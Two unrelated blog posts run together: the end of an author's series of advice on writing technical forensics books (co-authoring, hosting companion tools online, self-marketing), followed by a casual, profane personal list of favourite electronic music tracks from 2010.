Writing a book as the sole author can be tough, as it is a lot of work...but I think that writing a book as multiple authors, particularly when none of the authors ever actually sit in a room together, is much harder. There are a lot of decisions that need to be made and coordinated ahead of time, and continually revisited throughout the process. Again, writing books in this field is NOT a full-time job...as such, people's day jobs and lives tend to take precedence. Family illness, holidays, vacations, etc., all play a role in the schedule that needs to be worked out ahead of time.

Another thing to consider is that someone has to take the lead on tone...or not. You need to decide early on what the division of labor will be (split up chapters or sections), and whether or not you feel it's important to have a single tone throughout the book. There will be times when it makes sense to have a single tone, and there will be other times when it's pretty clear that you aren't going to have a single tone, as the various authors take the lead on the chapters for which they have the most expertise in the subject matter.

Providing Materials With Your Book
I'm one of those folks who writes some of my own code, and I tend to create my own tools, whether they be a batch file or a Perl script. As such, it's helpful to others if I make those tools available to them in some manner, and this is often done by putting those tools on a CD or DVD included with the book. I think that a lot of times, this increases the value of the book, but it can also be a bit difficult to deal with...so how you provide the materials is something to consider up front. Another item that a lot of folks find interesting and very valuable is "cheat sheets"...if you list or explain a process in your book, and it covers a good portion of a chapter, it might be a good idea to provide a cheat sheet that the reader can print out (perhaps modify to meet their own needs) and use. How you intend to provide these, and other materials (i.e., videos that show the viewer how to do something step-by-step, etc.) is something that you need to consider ahead of time.

The point is that if there are materials you're going to refer to in your book, you have to figure out ahead of time how you're going to provide them. In my experience, there's two ways you can do this...provide the materials on the DVD that comes with the book, or provide them separately. I have usually opted to provide the materials on a DVD, but after having written a couple of books, I think I'm going to move to something completely separate, and provide the materials online.

I have decided to do this for a couple of reasons. One is that there's always someone out there who ends up purchasing a copy of the book that mysteriously doesn't have a DVD. Or they loose the DVD. Or they leave it at home or at work, when they need it in the other location. Then there's the folks who purchase ebooks for their Kindle or other ereader, and never got the email that says, "...go here to download additional content." Or they did, but the publisher modified their infrastructure so now the instructions or path aren't valid. And, of course, there's always the person who's going to contact you directly because they want to ensure that they have the latest copy of the materials.

My thinking is that a lot of these issues can be avoided if you choose a site like Google Code or something else that is appropriate (and relatively stable/permanent) for hosting your additional materials. That way, you can control what's most up-to-date and not have to rely on someone else's schedule for that. You can refer to the actual tools (and other materials) in the book, so that having the book itself makes the tools more valuable, but by providing them on the web, you can include "here are the absolute latest, newest, most up to date copies" on the page where the reader will go to download those tools.




Self-Marketing
Blogging is a great way to get started and get the feel for writing, without the constraints of editing (and things like spelling, grammar, etc.). Face it, some folks don't take criticism of any kind well, and don't put a great deal stock in checking their own spelling and grammar...so blogging is sort of a way to get into writing without having someone looking over your shoulder. It's also a great way for some folks to realize how important that sort of thing is.

Blogging is also a great way to self-market your book, prior to and following publication. It's a great way to start talking about the book, to answer questions that you get about your book and materials, address errata, etc. In some ways, a blog can also lay the groundwork for a second edition, or even just for your next effort, as you get feedback, read reviews, post new ideas, etc. For example, if you start to see that your book on forensic analysis is linked to another blog on malware reverse engineering, with that author making comments about what you've written (positive or negative), that could be a good indicator for you...what do you need to improve on, expand on, and what were you dead on with in your book?

Take the lead on marketing your book. Present the publisher with ideas, and take the lead on getting the word out there (assuming that that's what you want). When WFA 2/e was coming out, I was excited because this was the first book in a new direction that Syngress was going, something that was exemplified by the new cover design. That summer, the SANS Forensic Summit was going to be in Washington, DC, and I was attending as a speaker. As I looked more and more into the conference, and who was speaking and attending, I counted almost half a dozen Syngress authors who would be there, all of whom had the work "forensics" in their book title. I contacted the publisher to find out if they'd have a bookstore...I thought, between sessions I could answer questions about the book. Well, it turns out that they had NO PLANS for a bookstore!! I thought (and said to them), you've GOT to be kidding me! Here's a conference with "forensics" in the title, and all these authors of "forensics" books will be there...to me, it was a total marketing coup. The short story is that the editor was there with books on a table and it was a huge success for everyone.

Final Thoughts...
And now, some final thoughts as I close out this series of posts.

I hope that in reading these posts, you've enjoyed them and at the same time gotten something out of them. I tend to take something of a blunt approach, in part because I don't want to sugarcoat things for someone who's considering writing a technical book. Yes, it is hard...but if you know up front what you may be facing, you're less likely to let it slow you down. One of the hardest things about writing books is that you're rarely, if ever, face-to-face with anyone from the publisher's staff when discussing your book. In fact, you're rarely face-to-face with anyone throughout the process.

One of the misconceptions a lot of folks who have never written a book have about authors is that they retain some modicum of control over what happens with the book once it's submitted to the printer. Nothing could be further from the truth. When WFA 1/e was released by Syngress, a PDF version of the book was available...for the first couple of weeks, it was provided with each copy of the book purchased through the Syngress web site. After that, it was available for purchase. Later, Syngress was purchased by Elsevier, a company out of Europe that produced all e-format versions of its books EXCEPT PDF. The author's role in any of that, particularly in the availability of a PDF version of their book, is zero. And I say that only because there's nothing less than zero.

Another misconception that I've run across is that most folks think that book authors have access to endless resources, or that somehow, the publishing company will provide those resources. This simply isn't the case. When I submitted the proposal for the Registry forensics book, all of the reviews came back saying that I needed to include discussion of the use of commercial tools, such as EnCase and FTK. Well, the short answer was "no"; the long answer was that I neither have access to, nor have I been able to obtain a temporary license for either...and none of the reviewers was offering such a license. In all fairness, I will say that I was offered a temporary license to one of the commercial tools, but by the time that offer was available, I was too far into the writing process to go back and add that work and material into the book. I would have been particularly time consuming because I don't use those tools regularly. Anyway, my point is that when I have written my books, I tend to do so based on my own experiences, or those interesting experiences that others have shared. I tend not to write about ediscovery, because I've never done it. I likely won't be writing about Registry analysis of a Windows-powered car or Windows 7 phone, because I neither own nor have access to either, nor do I have the tools available to work with either. Like most authors, I don't have access to massive data centers for testing various operating systems and application installations across numerous configurations.

Keep in mind that your book is not going to be everything to everyone. You're going to have critics, and you're also going to have "armchair quarterbacks". You're going to have people who post to public forums that you "should've done this...", and not once have a good thing to say about your work. You're going to have folks who will email you glowing commendations for what you've done, but not post them publicly...even when they purchased your book based on a publicly-posted review. Don't let any of this bother you. One of my good friends who's also written a book has received some not-so-glowing criticism, to which he's responded, "...come see me when you've published a book." In short, don't let criticism get you down, and don't let it be an obstacle that prevents you from writing in the first place.

Finally, I want to say once again that writing technical books is tough. It's tough enough if you're a single person and not at all used to writing. If you're married (particularly newly married) and/or have small children, it can be logarithmically harder, and it will require even more discipline to write. However, it can also be extremely rewarding. Seeing your work published and sitting on a bookshelf is very rewarding. Think about it...you've completed and achieved something that few others have attempted. If you've put the effort in and done the best you can, you should take pride in what you've done...and don't let the little things becomes insurmountable obstacles that prevent you from even trying.

a subjective, incomplete list of my favourite tracks from 2010


reading the various end of year lists that have been appearing over the last month has been an interesting experience. it seems my 2010 was different from plenty of others out there (or perhaps not). i didn't even know that horrible steaming pile of shit 'without you' existed until it appeared number 1 on the RA top tracks. over at LWE kassem mosse's track on laid was their clear choice for track of the year, but i certainly didn't connect with it to the same degree. we've got the vinyl, but it hasn't been played much. meanwhile i've only heard 2 of the tracks that made it into FACT's top 10. those guys are a bit too on it for me. i'll catch up to some of it in a couple of months in my own good time... my favourite tracks are mainly ones i've found and fallen in love with by myself, and what follows is certainly not a 'best tracks of 2010', it is a 'chris' favourite tracks of 2010'. i think they are all awesome, but shit, who the fuck am i to say they are the best, whatever the hell that means in this context. if the RA top 50 showed us anything, it was the limited use of these exercises... nonetheless, if in listing these tracks if you find one or two gems you'd missed, this will have been worthwhile. and from my perspective, at least, the artitsts and labels involved with these tracks deserve recognition for some quality efforts.

please keep in mind that like with my favourite mixes, this list has been shaped heavily by what i've listened to, and listened to the most. there are plenty of other great tracks out there, but if they are not ones i've heard or played heavily, i don't see much point including them here.

chris' favourite tracks of 2010 (in random order)

sandwell district - 'falling the same way': ok, probably you are all going to think i'm a prick for starting off with a track that has only just hit the stores. whatever, it's my list, and this track is one i've been playing on repeat since i got it. function played it right at the beginning of his monumental set at labyrinth this year. when i listen to that, it brings back echoes and memories of that special event.

senking - 'V8': on an album full of highlights, this is the clear winner. what a fucking epic track. music for a party on the ocean floor.



svreca - 'utero' (regis remix): i don't know quite how to describe this track, but there is so much depth and meaning in it. if i had to pick one track from 2010, this would be it. i have listened to this so many times, and it still hits me just as hard.



shackleton - 'bastard spirit' and 'mukuba special': i am glad sam shackleton exists. we need more people like him making electronic music.



mika vainio - 'it's a muthang': this is about as close as i can imagine mika vainio will ever get to being loose and wild. hell, it is even funky. i am looking forward to playing this at our mnml ssgs party.



the panamax project - 'maximum height': wax30003 might have been the one everybody charted in 2010, but that left me cold. this is the one that gets me hot.

space dimension controller 'journey to the core of the unknown sphere': well, 'temporary thrillz' was very appropriately named, as far as i am concerned. i got nothing out of that release. but 'journey...' is a different story. i'm not as sold on SDC as most others seem to be, but this track is clear evidence that the guy has a lot of potential. the build and kick on this are just awesome.



gunnar jonsson - 'morgon�nga': i don't have much to say about this track. it is just beautiful. it could keep on going forever.

   

peter van hoesen - 'irrational x' (slow mix): peter has had another impressive year production-wise. i am not sure this is the best track he has put out in 2010, but it's my favourite, simply because it brings back very strong echoes of his incredible 2009 livepa at labyrinth.

desolate - 'heroic death': special track, special memories.



conforce - 'pretty far from here': i was a bit slow jumping on the conforce train, but i have now well and truly rectified that problem. while it was his 'grace' EP on delsin that put him on the map in 2010, it was this track that i fell for. there is nothing that complicated or new about this. it's just a classic sound executed to perfection.



move d - 'aspiration 2010': in comparison to the last couple of years, 2010 was a much quieter year from move d on the production side of things. but that is just fine by me, because this is the best thing he has done in ages. an absolute gem. move d at his very best.



benjamin brunn - 'my heart': ah, you gotta love benjamin. his music is just so warm and friendly. listening to this track is like a big musical hug.



donato dozzy and claudio fabrianesi - 'fade out': i really love this whole EP. i am not quite sure why it didn't get more attention. slow burners from the italians...

donato dozzy and dj say - 'your eyes': absolute killer. not much more to say (pun intended).



nuel - aquaplano ltd 01 (A2): while i'm talking about the italians, this one definitely needs to be in there too. the techno cuts on this EP are very strong, but it is this ambient one that kills me. beautiful music from a beautiful person. full respect.

martyn featuring spaceape - 'is this insanity?' (ben klock remix): there isn't anything too complicated going on here, it is just an incredibly effective track. this is not normally something i'd like but klock makes it work.



the black dog - 'sleepdeprivation 2': on a great album, this was definitely my favourite track. it's very powerful and atmospheric, and it manages to convey / induce some very ambiguous emotions. delicate, complex and beautiful.



sigha - 'light swells (in a distant place)': gorgeous ambient track. for me this track was a clear indication of sigha maturing as a producer. the title of this track is actually not a bad description of his future, except the 'distant' part! expecting big things from him in 2011.



l.b. dub corp - 'take it down (in dub)': how the hell this EP hasn't been featuring in more EoY lists i have no idea, as both sides of this are totally awesome. what has been rating high is the ostgut label, and again, i don't quite agree with this. they've had a good, but not great, year in my books. this was pretty clearly their strongest release of 2010. what i love about this track is how perfectly it encapsulates berghain itself. this really sounds purpose built for that space.



urban tribe - 'insolitology': urban tribe really had a great 2010. full respect. probably my favourite track of theirs for 2010 was this one, and interesting enough, if you look at the credits of the record it is not produced by the core group in detroit, but a relatively new producer by the name of mariska neerman. i haven't heard much from her besides this (you can check a live recording of her playing at bleep43 here), but this track makes me keen to find out more.



raime - 'we must hunt under the wreckage of many systems': i could have easily included here any of the raime tracks released on blackest ever black, i love them all equally, and both EPs have received heavy play from me. very strong start from this label and these producers. looking forward to see how their trajectory continues in 2011.



forest swords: 'if your girl': again, basically any and all forest swords tracks could be put here, but i'll choose this one. the  way the track develops, and then the drums come in... ah, this one is beautiful. i still don't know what to think of these new sub-genres forest swords is associated with, but i do know this guy is doing something very powerful and special.



ANBB - 'ret marut handshake': the ANBB album was a bit of a disappointment, mainly because we'd already heard all the best tracks on the EP. there are a couple that i really love ('one' is also great), but this is where the combo really works best, creating a strong and powerful feeling of controlled aggression. powerful track.



kanding ray - 'pruitt igoe' (alva noto remodel): the standout on a very strong EP. when carsten nicolai makes more techno orientated music, the results are always special. raster-noton has had another incredible 2010 and the fact that i don't think i've seen them on any top labels lists (except ours, which are forthcoming), shows you just how bullshit and arbitrary such exercises are anyway.



ok, i am sure there are more tracks, but those are the ones i've remembered... going through this list one thing that is clear to me is 2010 has been a great year for music. looking forward to what 2011 holds. other ssgs, please add your lists in the comments!

 
Internet